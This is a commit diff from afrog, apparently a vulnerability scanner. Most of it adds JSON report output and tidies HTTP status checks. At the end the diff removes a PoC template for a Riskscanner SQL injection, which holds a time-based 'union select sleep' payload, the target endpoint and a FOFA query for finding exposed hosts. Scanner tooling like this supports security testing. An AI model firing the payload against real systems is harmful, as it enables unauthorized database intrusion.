STRLCPY/afrog

■ ■ ■ ■ ■ ■

.gitignore

■ ■ ■ ■ ■ ■

cmd/afrog/main.go

		skipped 68 lines
69	69		htemplate.Result = r
70	70		htemplate.Number = utils.GetNumberText(int(number))
71	71		htemplate.Append()
	72	+
	73	+	if len(options.OutputJson) > 0 {
	74	+	options.OJ.AddJson(r.PocInfo.Id, r.PocInfo.Info.Severity, r.FullTarget)
	75	+	}
72	76		}
73	77		lock.Unlock()
74	78		}
		skipped 27 lines
102	106		flagSet.CreateGroup("output", "Output",
103	107		flagSet.StringVarP(&options.Output, "output", "o", "", "output html report, eg: -o result.html"),
104	108		flagSet.BoolVarP(&options.PrintPocs, "printpocs", "pp", false, "print afrog-pocs list"),
	109	+	flagSet.StringVar(&options.OutputJson, "json", "", "write output in JSON format"),
105	110		)
106	111
107	112		flagSet.CreateGroup("filters", "Filtering",
		skipped 33 lines

■ ■ ■ ■ ■ ■

internal/runner/runner.go

		skipped 1 lines
2	2
3	3		import (
4	4		"fmt"
	5	+	"net/http"
5	6		"os"
6	7		"sync"
7	8		"time"
		skipped 6 lines
14	15		"github.com/zan8in/afrog/pkg/fingerprint"
15	16		"github.com/zan8in/afrog/pkg/html"
16	17		"github.com/zan8in/afrog/pkg/log"
	18	+	"github.com/zan8in/afrog/pkg/output"
17	19		"github.com/zan8in/afrog/pkg/poc"
18	20		"github.com/zan8in/afrog/pkg/protocols/http/retryhttpclient"
19	21		"github.com/zan8in/afrog/pkg/targetlive"
		skipped 36 lines
56	58		htemplate.Filename = options.Output
57	59		if err := htemplate.New(); err != nil {
58	60		gologger.Fatal().Msgf("Output failed, %s", err.Error())
	61	+	}
	62	+
	63	+	// output to json file
	64	+	if len(options.OutputJson) > 0 {
	65	+	options.OJ = output.NewOutputJson(options.OutputJson)
59	66		}
60	67
61	68		// show banner
		skipped 126 lines
188	195		// url, statusCode := http2.CheckTargetHttps(url)
189	196		url, statusCode = retryhttpclient.CheckHttpsAndLives(url)
190	197
191		-	if statusCode == -1 \|\| statusCode >= 500 {
	198	+	if statusCode == -1 \|\| statusCode >= http.StatusInternalServerError {
192	199		if statusCode == -1 && !utils.IsURL(url) {
193	200		url = "http://" + url
194	201		}
		skipped 10 lines
205	212		// url, statusCode := http2.CheckTargetHttps(url)
206	213		url, statusCode = retryhttpclient.CheckHttpsAndLives(url)
207	214
208		-	if statusCode == -1 \|\| statusCode >= 500 {
	215	+	if statusCode == -1 \|\| statusCode >= http.StatusInternalServerError {
209	216		if statusCode == -1 && !utils.IsURL(url) {
210	217		url = "http://" + url
211	218		}
		skipped 44 lines

■ ■ ■ ■ ■ ■

pkg/config/options.go

		skipped 3 lines
4	4		"strings"
5	5		"sync"
6	6
	7	+	"github.com/zan8in/afrog/pkg/output"
7	8		"github.com/zan8in/afrog/pkg/utils"
8	9		"github.com/zan8in/afrog/pocs"
9	10		"github.com/zan8in/gologger"
		skipped 93 lines
103	104
104	105		// afrog process count (target total × pocs total)
105	106		ProcessTotal uint32
	107	+
	108	+	// write output in JSONL(ines) format
	109	+	OutputJson string
	110	+
	111	+	OJ *output.OutputJson
106	112		}
107	113
108	114		type ApiCallBack func(any)
		skipped 61 lines

■ ■ ■ ■ ■ ■

pkg/output/json.go

1	+	package output
2	+
3	+	import (
4	+	"bufio"
5	+	"encoding/json"
6	+	"os"
7	+	"strings"
8	+	"sync"
9	+
10	+	"github.com/zan8in/gologger"
11	+	)
12	+
13	+	type OutputJson struct {
14	+	Filename string
15	+	JsonSlices []JsonInfo
16	+	mutex sync.Mutex
17	+	}
18	+
19	+	type JsonInfo struct {
20	+	Name string `json:"name"`
21	+	Severity string `json:"severity"`
22	+	Url string `json:"url"`
23	+	}
24	+
25	+	func NewOutputJson(filename string) *OutputJson {
26	+	return &OutputJson{
27	+	Filename: "reports/" + filename,
28	+	JsonSlices: make([]JsonInfo, 0),
29	+	mutex: sync.Mutex{},
30	+	}
31	+	}
32	+
33	+	func (o *OutputJson) AddJson(name, severity, url string) {
34	+	o.JsonSlices = append(o.JsonSlices, JsonInfo{Name: name, Severity: severity, Url: url})
35	+
36	+	if len(o.JsonSlices) > 0 {
37	+
38	+	o.mutex.Lock()
39	+	defer o.mutex.Unlock()
40	+
41	+	content := "["
42	+
43	+	for _, j := range o.JsonSlices {
44	+	v, _ := json.Marshal(&j)
45	+	content += string(v) + ","
46	+	}
47	+
48	+	content = strings.TrimSuffix(content, ",")
49	+
50	+	content += "]"
51	+
52	+	f, err := os.OpenFile(o.Filename, os.O_WRONLY\|os.O_CREATE, 0666)
53	+	if err != nil {
54	+	gologger.Fatal().Msgf("OutputJson to file %s failed, %s", o.Filename, err.Error())
55	+	}
56	+
57	+	wbuf := bufio.NewWriterSize(f, len(content))
58	+	wbuf.WriteString(content)
59	+	wbuf.Flush()
60	+
61	+	}
62	+
63	+	}
64	+

■ ■ ■ ■ ■ ■

pocs/temp/afrog-pocs/vulnerability/Riskscanner-list-SQL.yaml

1	-	id: Riskscanner-list-SQL
2	-
3	-	info:
4	-	name: Riskscanner list SQL注入漏洞
5	-	author: daffainfo
6	-	severity: critical
7	-	description: Riskscanner list接口存在SQL注入漏洞，通过漏洞可获取服务器权限
8	-	reference:
9	-	- https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/Riskscanner%20list%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
10	-	metadata:
11	-	fofa-query: title="Riskscanner"
12	-
13	-	set:
14	-	sleepSecond: randomInt(4, 6)
15	-	rules:
16	-	r0:
17	-	request:
18	-	method: POST
19	-	path: /resource/list/1/10
20	-	body: \|
21	-	{"sort":"1)a union select sleep({{sleepSecond}}) -- -"}
22	-	expression: sleepSecond * 1000 <= response.latency <= sleepSecond * 1000 + 500
23	-	expression: r0()